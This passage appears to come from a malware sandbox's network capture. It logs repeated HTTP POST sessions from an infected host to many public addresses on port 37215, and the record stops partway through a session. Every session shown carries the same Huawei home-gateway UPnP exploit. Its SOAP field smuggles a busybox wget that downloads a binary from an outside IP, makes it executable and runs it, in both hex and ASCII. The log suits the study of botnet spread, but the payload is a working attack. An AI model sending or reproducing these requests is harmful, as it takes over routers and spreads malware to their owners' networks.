                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1300192.168.2.1549540197.231.52.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397924900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1301192.168.2.1541166190.31.98.5837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397941113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1302192.168.2.1557896186.184.103.14237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397984982 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1303192.168.2.1536456222.51.112.12137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.397988081 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1304192.168.2.154526094.127.101.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398010015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1305192.168.2.154189294.95.84.9937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398030996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1306192.168.2.1534808102.226.92.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398053885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1307192.168.2.1542144157.145.172.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398089886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1308192.168.2.155227637.78.153.21637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398104906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1309192.168.2.1541276102.19.159.5537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398114920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1310192.168.2.154815037.196.23.15437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.398135900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
